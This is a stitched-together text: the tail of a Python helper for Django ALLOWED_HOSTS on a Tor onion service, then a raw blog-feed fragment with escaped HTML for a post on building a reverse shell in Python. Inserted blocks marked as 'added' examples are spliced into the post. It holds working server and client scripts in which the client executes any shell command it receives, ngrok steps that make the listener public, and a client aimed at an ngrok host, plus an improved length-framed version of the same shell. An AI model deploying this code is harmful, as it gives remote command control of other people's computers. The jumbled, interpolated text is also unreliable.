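    """ALLOWED_HOSTS value for settings.py: the onion address, plus the
    loopback address so that you can still test with curl on the box."""
    return [parse_hostname_file(hostname_text), '127.0.0.1']


def host_allowed(host, allowed_hosts):
    """Simplified version of Django's ALLOWED_HOSTS check: '*' matches every
    host, a pattern starting with '.' matches the domain and its subdomains,
    anything else has to match exactly."""
    host = host.lower()
    for pattern in allowed_hosts:
        pattern = pattern.lower()
        if pattern == '*' or pattern == host:
            return True
        if pattern.startswith('.') and (host.endswith(pattern) or host == pattern[1:]):
            return True
    return False


if __name__ == '__main__':
    # Constructed demo input: the hostname file content as Tor writes it.
    sample = 'z3wkaghfy4cmuqcrgskpvdava55qsbfrz5vvqthuemv2cktuwxvztcyd.onion\n'
    hosts = allowed_hosts_for(sample)
    print('ALLOWED_HOSTS =', hosts)
    for candidate in (sample.strip(), 'evil.example'):
        print(candidate, '->', host_allowed(candidate, hosts), '(wildcard:',
              host_allowed(candidate, ['*']), ')')
```

In settings.py this becomes ALLOWED_HOSTS = allowed_hosts_for(open('/path/to/copy/of/hostname').read()); with the wildcard, a request carrying Host: evil.example is accepted and any absolute URL Django builds from the request uses the attacker's name.
<p>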
Use the Tor browser to\nbe the first one to read my posts.<\/p>\n<\/div>\n","category":[{"@attributes":{"term":"security"}},{"@attributes":{"term":"security"}},{"@attributes":{"term":"linux"}},{"@attributes":{"term":"darknet"}},{"@attributes":{"term":"tor"}}]},{"title":"A reverse shell with Python","link":{"@attributes":{"href":"https:\/\/axju.de\/posts\/2021\/02\/a-reverse-shell-with-python\/","rel":"alternate"}},"published":"2021-02-19T19:00:00+01:00","updated":"2021-02-19T19:00:00+01:00","author":{"name":"Axel Juraske"},"id":"tag:axju.de,2021-02-19:\/posts\/2021\/02\/a-reverse-shell-with-python\/","summary":"<p class=\"first last\">I'll show you how to create a reverse shell using Python and how to make the server public using ngrok<\/p>\n","content":"<p><strong>Disclaimer<\/strong>: The described methods should only be used on systems you\nhave access rights to. I used this method to get access to my mum's PC, which I was\nallowed to. And yes, I'm 31, have my own family, but still help my mom with her PC.<\/p>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/reverse-shell-003.gif\" style=\"width: 100%;\" \/>\n<div class=\"section\" id=\"some-basics\">\n<h2>Some basics<\/h2>\n<p>What is a reverse shell? With a reverse shell, the target makes the connection.\nOn your own machine you run a server program that listens for incoming\nconnections, and the target executes a client program that connects to it.\nThen you can run commands on the target from your machine. 
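<\/p>\n<p>The exchange described above as a runnable model, added here as an example and not part of the original post. Both sides run in one process over a socketpair, so it needs no network; replacing the socketpair with listen() and accept() on the server side and connect() on the target side gives the networked version. Every message carries a 4-byte length prefix, so command output longer than a single recv() call arrives complete, and the target keeps executing commands until it receives the word quit. The command strings used in the demo are constructed for this example.<\/p>

```python
import socket
import struct
import subprocess
import sys
import threading

# Added example, not the post's own code. Same roles as in the post: the
# "server" is the listener on your machine, the "target" runs the commands.
# Every message is prefixed with its length, so output longer than one
# recv() call arrives complete. socket.socketpair() stands in for
# listen()/accept() on the server and connect() on the target.

HEADER = struct.Struct('!I')  # 4-byte big-endian length prefix


def send_msg(sock, data):
    """Send one length-prefixed message."""
    sock.sendall(HEADER.pack(len(data)) + data)


def recv_exact(sock, n):
    """Read exactly n bytes; raise ConnectionError if the peer hangs up first."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('peer closed the connection')
        buf.extend(chunk)
    return bytes(buf)


def recv_msg(sock):
    """Receive one length-prefixed message."""
    (length,) = HEADER.unpack(recv_exact(sock, HEADER.size))
    return recv_exact(sock, length)


def run_command(cmd):
    """Run cmd in the local shell and return its stdout and stderr as bytes."""
    proc = subprocess.run(cmd, shell=True, capture_output=True)
    return proc.stdout + proc.stderr


def target_loop(sock):
    """Target side: greet, then execute every command until 'quit' arrives."""
    send_msg(sock, b'welcome')
    try:
        while True:
            cmd = recv_msg(sock).decode()
            if cmd.lower() == 'quit':
                break
            send_msg(sock, run_command(cmd))
    finally:
        sock.close()


def run_session(commands):
    """Server side, driven by a list of commands instead of input().
    Returns one bytes object of output per command."""
    server_side, target_side = socket.socketpair()
    worker = threading.Thread(target=target_loop, args=(target_side,))
    worker.start()
    outputs = []
    try:
        if recv_msg(server_side) != b'welcome':
            raise RuntimeError('unexpected greeting from target')
        for cmd in commands:
            send_msg(server_side, cmd.encode())
            outputs.append(recv_msg(server_side))
        send_msg(server_side, b'quit')
    finally:
        # closing first guarantees the target sees EOF even on an error path
        server_side.close()
        worker.join()
    return outputs


def long_output_command(n):
    """Constructed command that prints n bytes plus a newline, more than the
    1024 bytes a single recv(1024) would deliver."""
    return f'{sys.executable} -c "print(\'x\' * {n})"'


if __name__ == '__main__':
    for out in run_session(['echo hello', long_output_command(5000)]):
        print(len(out), 'bytes received')
```

The same framing is what you would add to the two scripts in this post once a command such as a directory listing produces more than 1024 bytes; without it, the rest of the output is read by the next command's recv() and the two sides drift out of step.
<p>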
My research:<\/p>\n<blockquote>\n<ul class=\"simple\">\n<li><a class=\"reference external\" href=\"https:\/\/www.acunetix.com\/blog\/web-security-zone\/what-is-reverse-shell\/\">Acunetix<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/www.thepythoncode.com\/article\/create-reverse-shell-python\">PythonCode<\/a><\/li>\n<li><a class=\"reference external\" href=\"https:\/\/www.netsparker.com\/blog\/web-security\/understanding-reverse-shells\/\">netsparker<\/a><\/li>\n<\/ul>\n<\/blockquote>\n<\/div>\n<div class=\"section\" id=\"python\">\n<h2>Python<\/h2>\n<p>We will write two small Python scripts, one for the server and one for the\nclient. The only modules we use are\n<a class=\"reference external\" href=\"https:\/\/docs.python.org\/3\/library\/socket.html\">socket<\/a> and\n<a class=\"reference external\" href=\"https:\/\/docs.python.org\/3\/library\/subprocess.html\">subprocess<\/a>. Make sure you\nhave read the documentation. The programs are short and self-explanatory,\nnothing complicated, just a little loop.<\/p>\n<div class=\"section\" id=\"server\">\n<h3>Server<\/h3>\n<div class=\"highlight\"><pre><span><\/span><span class=\"kn\">import<\/span> <span class=\"nn\">socket<\/span>\n\n<span class=\"n\">HOST<\/span> <span class=\"o\">=<\/span> <span class=\"s1\">&#39;0.0.0.0&#39;<\/span>\n<span class=\"n\">PORT<\/span> <span class=\"o\">=<\/span> <span class=\"mi\">5555<\/span>\n\n<span class=\"c1\"># set up the socket so that it waits for an incoming connection<\/span>\n<span class=\"n\">s<\/span> <span class=\"o\">=<\/span> <span class=\"n\">socket<\/span><span class=\"o\">.<\/span><span class=\"n\">socket<\/span><span class=\"p\">()<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">setsockopt<\/span><span class=\"p\">(<\/span><span class=\"n\">socket<\/span><span class=\"o\">.<\/span><span class=\"n\">SOL_SOCKET<\/span><span class=\"p\">,<\/span> <span class=\"n\">socket<\/span><span class=\"o\">.<\/span><span 
class=\"n\">SO_REUSEADDR<\/span><span class=\"p\">,<\/span> <span class=\"mi\">1<\/span><span class=\"p\">)<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">bind<\/span><span class=\"p\">((<\/span><span class=\"n\">HOST<\/span><span class=\"p\">,<\/span> <span class=\"n\">PORT<\/span><span class=\"p\">))<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">listen<\/span><span class=\"p\">(<\/span><span class=\"mi\">1<\/span><span class=\"p\">)<\/span>\n<span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"sa\">f<\/span><span class=\"s1\">&#39;[*] listening as <\/span><span class=\"si\">{<\/span><span class=\"n\">HOST<\/span><span class=\"si\">}<\/span><span class=\"s1\">:<\/span><span class=\"si\">{<\/span><span class=\"n\">PORT<\/span><span class=\"si\">}<\/span><span class=\"s1\">&#39;<\/span><span class=\"p\">)<\/span>\n\n<span class=\"c1\"># wait for the target and send a welcome message once it has connected<\/span>\n<span class=\"n\">client_s<\/span><span class=\"p\">,<\/span> <span class=\"n\">client_addr<\/span> <span class=\"o\">=<\/span> <span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">accept<\/span><span class=\"p\">()<\/span>\n<span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"sa\">f<\/span><span class=\"s1\">&#39;[*] client connected <\/span><span class=\"si\">{<\/span><span class=\"n\">client_addr<\/span><span class=\"si\">}<\/span><span class=\"s1\">&#39;<\/span><span class=\"p\">)<\/span>\n<span class=\"n\">client_s<\/span><span class=\"o\">.<\/span><span class=\"n\">send<\/span><span class=\"p\">(<\/span><span class=\"s1\">&#39;welcome&#39;<\/span><span class=\"o\">.<\/span><span class=\"n\">encode<\/span><span class=\"p\">())<\/span>\n\n<span class=\"c1\"># this loop runs until you enter &#39;quit&#39;<\/span>\n<span class=\"k\">while<\/span> <span class=\"kc\">True<\/span><span class=\"p\">:<\/span>\n\n    <span 
class=\"c1\"># enter the command and send it to the target<\/span>\n    <span class=\"n\">cmd<\/span> <span class=\"o\">=<\/span> <span class=\"nb\">input<\/span><span class=\"p\">(<\/span><span class=\"s1\">&#39;&gt;&gt;&gt; &#39;<\/span><span class=\"p\">)<\/span>\n    <span class=\"n\">client_s<\/span><span class=\"o\">.<\/span><span class=\"n\">send<\/span><span class=\"p\">(<\/span><span class=\"n\">cmd<\/span><span class=\"o\">.<\/span><span class=\"n\">encode<\/span><span class=\"p\">())<\/span>\n\n    <span class=\"c1\"># check if you want to quit<\/span>\n    <span class=\"k\">if<\/span> <span class=\"n\">cmd<\/span><span class=\"o\">.<\/span><span class=\"n\">lower<\/span><span class=\"p\">()<\/span> <span class=\"o\">==<\/span> <span class=\"s1\">&#39;quit&#39;<\/span><span class=\"p\">:<\/span>\n        <span class=\"k\">break<\/span>\n\n    <span class=\"c1\"># get the result of the command executed on the target pc; recv(1024)<\/span>\n    <span class=\"c1\"># returns at most 1024 bytes, so longer output is cut off<\/span>\n    <span class=\"n\">result<\/span> <span class=\"o\">=<\/span> <span class=\"n\">client_s<\/span><span class=\"o\">.<\/span><span class=\"n\">recv<\/span><span class=\"p\">(<\/span><span class=\"mi\">1024<\/span><span class=\"p\">)<\/span><span class=\"o\">.<\/span><span class=\"n\">decode<\/span><span class=\"p\">()<\/span>\n    <span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"n\">result<\/span><span class=\"p\">)<\/span>\n\n<span class=\"n\">client_s<\/span><span class=\"o\">.<\/span><span class=\"n\">close<\/span><span class=\"p\">()<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">close<\/span><span class=\"p\">()<\/span>\n<\/pre><\/div>\n<\/div>\n<div class=\"section\" id=\"client\">\n<h3>Client<\/h3>\n<div class=\"highlight\"><pre><span><\/span><span class=\"kn\">import<\/span> <span class=\"nn\">socket<\/span>\n<span class=\"kn\">import<\/span> <span class=\"nn\">subprocess<\/span>\n\n<span class=\"n\">HOST<\/span> <span class=\"o\">=<\/span> <span 
class=\"s1\">&#39;0.0.0.0&#39;<\/span>\n<span class=\"n\">PORT<\/span> <span class=\"o\">=<\/span> <span class=\"mi\">5555<\/span>\n\n<span class=\"c1\"># set up the socket and connect to the server<\/span>\n<span class=\"n\">s<\/span> <span class=\"o\">=<\/span> <span class=\"n\">socket<\/span><span class=\"o\">.<\/span><span class=\"n\">socket<\/span><span class=\"p\">()<\/span>\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">connect<\/span><span class=\"p\">((<\/span><span class=\"n\">HOST<\/span><span class=\"p\">,<\/span> <span class=\"n\">PORT<\/span><span class=\"p\">))<\/span>\n\n<span class=\"c1\"># get the welcome message<\/span>\n<span class=\"n\">msg<\/span> <span class=\"o\">=<\/span> <span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">recv<\/span><span class=\"p\">(<\/span><span class=\"mi\">1024<\/span><span class=\"p\">)<\/span><span class=\"o\">.<\/span><span class=\"n\">decode<\/span><span class=\"p\">()<\/span>\n<span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"s1\">&#39;[*] server:&#39;<\/span><span class=\"p\">,<\/span> <span class=\"n\">msg<\/span><span class=\"p\">)<\/span>\n\n<span class=\"c1\"># this loop will run until it receive &#39;quit&#39;<\/span>\n<span class=\"k\">while<\/span> <span class=\"kc\">True<\/span><span class=\"p\">:<\/span>\n\n    <span class=\"c1\"># receive the command and print it<\/span>\n    <span class=\"n\">cmd<\/span> <span class=\"o\">=<\/span> <span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">recv<\/span><span class=\"p\">(<\/span><span class=\"mi\">1024<\/span><span class=\"p\">)<\/span><span class=\"o\">.<\/span><span class=\"n\">decode<\/span><span class=\"p\">()<\/span>\n    <span class=\"nb\">print<\/span><span class=\"p\">(<\/span><span class=\"sa\">f<\/span><span class=\"s1\">&#39;[*] receive <\/span><span class=\"si\">{<\/span><span class=\"n\">cmd<\/span><span class=\"si\">}<\/span><span 
class=\"s1\">&#39;<\/span><span class=\"p\">)<\/span>\n\n    <span class=\"c1\"># check if you want to quit<\/span>\n    <span class=\"k\">if<\/span> <span class=\"n\">cmd<\/span><span class=\"o\">.<\/span><span class=\"n\">lower<\/span><span class=\"p\">()<\/span> <span class=\"o\">==<\/span> <span class=\"s1\">&#39;quit&#39;<\/span><span class=\"p\">:<\/span>\n        <span class=\"k\">break<\/span>\n\n    <span class=\"c1\"># now run the command and get the result.<\/span>\n    <span class=\"k\">try<\/span><span class=\"p\">:<\/span>\n        <span class=\"n\">result<\/span> <span class=\"o\">=<\/span> <span class=\"n\">subprocess<\/span><span class=\"o\">.<\/span><span class=\"n\">check_output<\/span><span class=\"p\">(<\/span><span class=\"n\">cmd<\/span><span class=\"p\">,<\/span> <span class=\"n\">stderr<\/span><span class=\"o\">=<\/span><span class=\"n\">subprocess<\/span><span class=\"o\">.<\/span><span class=\"n\">STDOUT<\/span><span class=\"p\">,<\/span> <span class=\"n\">shell<\/span><span class=\"o\">=<\/span><span class=\"kc\">True<\/span><span class=\"p\">)<\/span>\n    <span class=\"k\">except<\/span> <span class=\"ne\">Exception<\/span> <span class=\"k\">as<\/span> <span class=\"n\">e<\/span><span class=\"p\">:<\/span>\n        <span class=\"n\">result<\/span> <span class=\"o\">=<\/span> <span class=\"nb\">str<\/span><span class=\"p\">(<\/span><span class=\"n\">e<\/span><span class=\"p\">)<\/span><span class=\"o\">.<\/span><span class=\"n\">encode<\/span><span class=\"p\">()<\/span>\n\n    <span class=\"c1\"># if the command has no output, send &#39;ok&#39; so the server knows everything is okay<\/span>\n    <span class=\"k\">if<\/span> <span class=\"nb\">len<\/span><span class=\"p\">(<\/span><span class=\"n\">result<\/span><span class=\"p\">)<\/span> <span class=\"o\">==<\/span> <span class=\"mi\">0<\/span><span class=\"p\">:<\/span>\n        <span class=\"n\">result<\/span> <span class=\"o\">=<\/span> <span class=\"s1\">&#39;OK&#39;<\/span><span 
class=\"o\">.<\/span><span class=\"n\">encode<\/span><span class=\"p\">()<\/span>\n\n    <span class=\"c1\"># send the result to the server<\/span>\n    <span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">send<\/span><span class=\"p\">(<\/span><span class=\"n\">result<\/span><span class=\"p\">)<\/span>\n\n<span class=\"n\">s<\/span><span class=\"o\">.<\/span><span class=\"n\">close<\/span><span class=\"p\">()<\/span>\n<\/pre><\/div>\n<\/div>\n<\/div>\n<div class=\"section\" id=\"how-to-run\">\n<h2>How to run<\/h2>\n<p>We only use the Python standard library, so we don't have to install anything.\nSimply execute<\/p>\n<div class=\"highlight\"><pre><span><\/span>python3 server.py\n<\/pre><\/div>\n<p>and<\/p>\n<div class=\"highlight\"><pre><span><\/span>python3 client.py\n<\/pre><\/div>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/reverse-shell-001.gif\" style=\"width: 100%;\" \/>\n<p>The server runs with <em>HOST=0.0.0.0<\/em> so that it listens on all interfaces and\naccepts connections from any address. In some examples you will read something like\n<em>HOST=localhost<\/em> or <em>HOST=127.0.0.1<\/em>, but then it only accepts connections\nfrom the <em>localhost<\/em>. You shouldn't change the <em>HOST<\/em> of the server script.\nThe client uses <em>HOST=0.0.0.0<\/em> as well; Linux treats a connection to 0.0.0.0 as a\nconnection to the local machine, so this works for a test on one PC, while Windows\nrefuses it, so use <em>127.0.0.1<\/em> there. If you run the client on another PC, you\nhave to enter the IP address of the server for the <em>HOST<\/em>. You get a problem if\nthat PC is not in your local network: the server sits behind your router's NAT and has\nno address the target can reach. Of course you can forward the port in your router and\nthen specify your public IP as <em>HOST<\/em>. But I want to show you another way.<\/p>\n<\/div>\n<div class=\"section\" id=\"ngrok\">\n<h2>ngrok<\/h2>\n<p>ngrok is a reverse proxy that creates a tunnel from a public endpoint on ngrok's\nservers to a service running on your local machine. It is mostly used for web services,\nbut with a TCP tunnel it forwards any TCP service. Simply put, with ngrok you can make\nany local service public. And we will make our server public.\n
Go to\n<a class=\"reference external\" href=\"https:\/\/ngrok.com\">ngrok<\/a>, sign up and follow the setup tutorial for your\nsystem. For me it's:<\/p>\n<blockquote>\n<ol class=\"arabic\">\n<li><p class=\"first\">download<\/p>\n<div class=\"highlight\"><pre><span><\/span>wget https:\/\/bin.equinox.io\/c\/4VmDzA7iaHb\/ngrok-stable-linux-amd64.zip\n<\/pre><\/div>\n<\/li>\n<li><p class=\"first\">unzip<\/p>\n<div class=\"highlight\"><pre><span><\/span>unzip ngrok-stable-linux-amd64.zip\n<\/pre><\/div>\n<\/li>\n<li><p class=\"first\">connect your account<\/p>\n<div class=\"highlight\"><pre><span><\/span>.\/ngrok authtoken 1WeW...\n<\/pre><\/div>\n<\/li>\n<li><p class=\"first\">expose the server<\/p>\n<div class=\"highlight\"><pre><span><\/span>.\/ngrok tcp <span class=\"m\">5555<\/span>\n<\/pre><\/div>\n<\/li>\n<\/ol>\n<\/blockquote>\n<p>Now you are ready to run the client on any target, but you have to change the\n<em>HOST<\/em> and <em>PORT<\/em> to the values from ngrok. For my example that will be<\/p>\n<div class=\"highlight\"><pre><span><\/span><span class=\"o\">...<\/span>\n<span class=\"n\">HOST<\/span> <span class=\"o\">=<\/span> <span class=\"s1\">&#39;4.tcp.ngrok.io&#39;<\/span>\n<span class=\"n\">PORT<\/span> <span class=\"o\">=<\/span> <span class=\"mi\">12050<\/span>\n<span class=\"o\">....<\/span>\n<\/pre><\/div>\n<img alt=\"alternate text\" src=\"https:\/\/axju.de\/images\/articels\/security\/reverse-shell-002.png\" style=\"width: 100%;\" \/>\n<p>Two things to keep in mind before you point a client at that address. The ngrok\nendpoint is reachable from the whole Internet, and the server accepts the first\nconnection that arrives without checking who it is. A TCP tunnel only encrypts the leg\nbetween your machine and the ngrok edge; between the target and <em>4.tcp.ngrok.io<\/em>\nthe data travels as the plain TCP stream our scripts send, so every command and result\ncrosses the Internet in cleartext, and the client runs whatever the host it connected\nto sends it.<\/p>\n<\/div>\n<div class=\"section\" id=\"conclusion\">\n<h2>Conclusion<\/h2>\n<p>As you can see, it's not that complicated to create your own reverse shell and\nmake it public. I know, there's a lot of space to improve this script.\n
But for a\nreally simple example they are quite good enough.<\/p>\n<\/div>\n","category":[{"@attributes":{"term":"security"}},{"@attributes":{"term":"security"}},{"@attributes":{"term":"linux"}},{"@attributes":{"term":"hacking"}},{"@attributes":{"term":"shell"}},{"@attributes":{"term":"sockets"}}]}]}
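The server and client in the Python section read every command and every result with a single recv(1024). A result longer than 1024 bytes is cut off, and the bytes left in the socket buffer are returned as the answer to the next command, so the two sides drift out of step. The following is an added example, not part of the original post: it keeps the same operator/target loop (shell=True, 'quit' to stop, 'OK' for empty output) but prefixes every message with its length, so a result of any size arrives whole. The function names send_msg, recv_msg, run_command, target_loop and operator_session, the loopback self-test that runs the target side in a thread, and the OS-chosen port are assumptions of this example.

```python
import socket
import struct
import subprocess
import threading

# Added example, not the post's own scripts: the same operator/target command
# loop, but every message is sent as a 4-byte big-endian length followed by
# the payload, so a result longer than one recv() call is still delivered whole.

HEADER = struct.Struct('!I')  # 4-byte unsigned length prefix


def send_msg(sock, data):
    """Send one framed message: length prefix, then the payload."""
    sock.sendall(HEADER.pack(len(data)) + data)


def recv_exact(sock, n):
    """Read exactly n bytes; recv() may return fewer, so loop until done."""
    buf = bytearray()
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('peer closed the connection')
        buf.extend(chunk)
    return bytes(buf)


def recv_msg(sock):
    """Read one framed message (the counterpart of send_msg)."""
    (length,) = HEADER.unpack(recv_exact(sock, HEADER.size))
    return recv_exact(sock, length)


def run_command(cmd):
    """Target side: run cmd in a shell, exactly like the post's client does."""
    try:
        out = subprocess.check_output(cmd, stderr=subprocess.STDOUT, shell=True)
    except Exception as e:
        out = str(e).encode()
    return out or b'OK'  # empty output still gets a reply, as in the post


def target_loop(sock, execute=run_command):
    """Target side: run every command received until 'quit', reply with the result."""
    while True:
        cmd = recv_msg(sock).decode()
        if cmd.lower() == 'quit':
            return
        send_msg(sock, execute(cmd))


def operator_session(commands, execute=run_command, host='127.0.0.1'):
    """Listener side. For an offline demonstration the target loop runs in a
    thread on the same machine and connects back over loopback (assumption of
    this example); returns the raw result bytes for each command, in order."""
    listener = socket.socket()
    listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    listener.bind((host, 0))  # port 0: the OS picks a free port
    listener.listen(1)
    port = listener.getsockname()[1]

    def target():
        with socket.socket() as s:
            s.connect((host, port))
            target_loop(s, execute)

    worker = threading.Thread(target=target, daemon=True)
    worker.start()

    results = []
    conn, _addr = listener.accept()
    with conn:
        for cmd in commands:
            send_msg(conn, cmd.encode())
            results.append(recv_msg(conn))
        send_msg(conn, b'quit')
    worker.join(timeout=5)
    listener.close()
    return results


if __name__ == '__main__':
    # 'echo' exists in every shell; the fake executor stands in for a command
    # whose output is far larger than the 1024 bytes the post's scripts read
    for r in operator_session(['echo hello']):
        print(r)
    print(len(operator_session(['big'], execute=lambda c: b'A' * 5000)[0]))
```

The execute parameter exists only so the exchange can be exercised without running a real command; in a deployment the target side is target_loop with the default run_command, and the operator side is the accept/send/recv loop inside operator_session. The framing does nothing for confidentiality or authentication: whoever reaches the listener still gets the same unauthenticated, cleartext command channel as the original scripts.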